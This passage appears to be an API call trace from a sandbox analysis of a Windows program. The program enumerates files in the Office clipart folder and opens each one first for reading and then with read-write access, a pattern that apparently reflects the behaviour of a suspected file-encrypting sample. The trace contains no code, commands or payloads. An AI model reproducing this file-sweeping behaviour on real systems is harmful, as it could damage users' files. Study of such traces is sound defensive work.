dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.231] GetFileType (hFile=0x33c) returned 0x1 [0104.231] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0104.231] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0104.231] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0104.231] CloseHandle (hObject=0x33c) returned 1 [0104.231] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01630_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01630_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.232] GetFileType (hFile=0x33c) returned 0x1 [0104.232] CloseHandle (hObject=0x33c) returned 1 [0104.232] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01630_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01630_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdbe306f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdbe306f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdbe306f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x128)) returned 1 [0104.232] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdbe306f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdbe306f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe7100f8, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x228, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="DD01631_.WMF", cAlternateFileName="")) returned 1 [0104.232] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01631_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01631_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.232] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01631_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01631_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.233] GetFileType (hFile=0x33c) returned 0x1 [0104.233] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0104.233] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0104.233] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0104.233] CloseHandle (hObject=0x33c) returned 1 [0104.233] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01631_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01631_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.233] GetFileType (hFile=0x33c) returned 0x1 [0104.236] CloseHandle (hObject=0x33c) returned 1 [0104.236] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01631_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01631_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdbe306f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdbe306f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe7100f8, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x228)) returned 1 [0104.236] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdbe306f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdbe306f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdbe306f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1034, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="DD01761_.WMF", cAlternateFileName="")) returned 1 [0104.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01761_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01761_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.236] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01761_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01761_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.237] GetFileType (hFile=0x33c) returned 0x1 [0104.237] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0104.237] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0104.237] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0104.237] CloseHandle (hObject=0x33c) returned 1 [0104.237] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01761_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01761_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.237] GetFileType (hFile=0x33c) returned 0x1 [0104.237] CloseHandle (hObject=0x33c) returned 1 [0104.238] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01761_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01761_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdbe306f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdbe306f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdbe306f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1034)) returned 1 [0104.238] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xebfae8f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xebfae8f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xebfae8f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8fc, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="DD01772_.WMF", cAlternateFileName="")) returned 1 [0104.238] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01772_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01772_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.238] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01772_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01772_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.239] GetFileType (hFile=0x33c) returned 0x1 [0104.239] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0104.239] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0104.239] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0104.239] CloseHandle (hObject=0x33c) returned 1 [0104.239] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01772_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01772_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.239] GetFileType (hFile=0x33c) returned 0x1 [0104.239] CloseHandle (hObject=0x33c) returned 1 [0104.239] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01772_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01772_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xebfae8f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xebfae8f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xebfae8f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8fc)) returned 1 [0104.240] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdbe306f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdbe306f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdbe306f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xcb4, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="DD01793_.WMF", cAlternateFileName="")) returned 1 [0104.240] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01793_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01793_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.240] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01793_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01793_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.240] GetFileType (hFile=0x33c) returned 0x1 [0104.240] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0104.240] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0104.240] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0104.240] CloseHandle (hObject=0x33c) returned 1 [0104.240] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01793_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01793_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.241] GetFileType (hFile=0x33c) returned 0x1 [0104.241] CloseHandle (hObject=0x33c) returned 1 [0104.241] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01793_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01793_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdbe306f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdbe306f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdbe306f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xcb4)) returned 1 [0104.241] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec9380a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xec9380a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf42d018, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1815, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="EAST_01.MID", cAlternateFileName="")) returned 1 [0104.241] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EAST_01.MID", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EAST_01.MID", lpUsedDefaultChar=0x0) returned 68 [0104.241] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EAST_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\east_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.241] GetFileType (hFile=0x33c) returned 0x1 [0104.241] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0104.241] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0104.242] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0104.242] CloseHandle (hObject=0x33c) returned 1 [0104.242] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EAST_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\east_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.242] GetFileType (hFile=0x33c) returned 0x1 [0104.242] CloseHandle (hObject=0x33c) returned 1 [0104.242] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EAST_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\east_01.mid"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec9380a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xec9380a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf42d018, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1815)) returned 1 [0104.242] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdc09280, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdc09280, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc09280, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x566, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ED00010_.WMF", cAlternateFileName="")) returned 1 [0104.242] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00010_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00010_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.242] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00010_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ed00010_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.243] GetFileType (hFile=0x33c) returned 0x1 [0104.243] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0104.243] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0104.243] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0104.243] CloseHandle (hObject=0x33c) returned 1 [0104.243] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00010_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ed00010_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.243] GetFileType (hFile=0x33c) returned 0x1 [0104.243] CloseHandle (hObject=0x33c) returned 1 [0104.244] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00010_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ed00010_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdc09280, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdc09280, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc09280, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x566)) returned 1 [0104.244] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdc09280, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdc09280, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc09280, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x32f2, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ED00019_.WMF", cAlternateFileName="")) returned 1 [0104.244] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00019_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00019_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.244] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00019_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ed00019_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.244] GetFileType (hFile=0x33c) returned 0x1 [0104.244] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0104.244] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0104.244] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0104.244] CloseHandle (hObject=0x33c) returned 1 [0104.245] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00019_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ed00019_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.245] GetFileType (hFile=0x33c) returned 0x1 [0104.245] CloseHandle (hObject=0x33c) returned 1 [0104.245] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00019_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ed00019_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdc09280, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdc09280, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc09280, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x32f2)) returned 1 [0104.245] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdc09280, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdc09280, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc09280, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa8c, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ED00172_.WMF", cAlternateFileName="")) returned 1 [0104.245] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00172_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00172_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.245] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00172_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ed00172_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.246] GetFileType (hFile=0x33c) returned 0x1 [0104.246] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0104.246] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0104.246] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0104.246] CloseHandle (hObject=0x33c) returned 1 [0104.246] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00172_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ed00172_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.246] GetFileType (hFile=0x33c) returned 0x1 [0104.246] CloseHandle (hObject=0x33c) returned 1 [0104.246] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00172_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ed00172_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdc09280, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdc09280, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc09280, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa8c)) returned 1 [0104.246] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdc09280, 